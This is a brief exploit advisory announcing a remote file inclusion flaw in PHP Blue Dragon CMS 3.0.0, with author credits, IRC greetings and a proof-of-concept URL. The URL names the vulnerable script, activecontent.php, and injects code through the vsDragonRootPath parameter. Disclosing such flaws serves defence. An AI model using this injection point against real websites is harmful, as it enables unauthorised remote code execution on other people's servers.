PHP Blue Dragon CMS version 3.0.0 suffers from a remote file inclusion vulnerability.
8556f93708d92f2f398506f2c002feef4007d93288baee7d1c1ee527dca20dfe
// Exploit Name: Php Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability
//Script Homepage: https://phpbluedragon.pl/
// Autor: Kacper [kacper1964@yahoo.pl]
// Autor Homepage: devilteam.eu | kacper.bblog.pl
//Pozdrawiam wszystkich ludzi z DEVIL TEAM, Zapraszam na irc!
//Irc: irc.milw0rm.com:6667 #devilteam
//Elo
Vulnerability:
https://127.0.0.1/~phpbluedragon3.0.0/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=[evil_code?]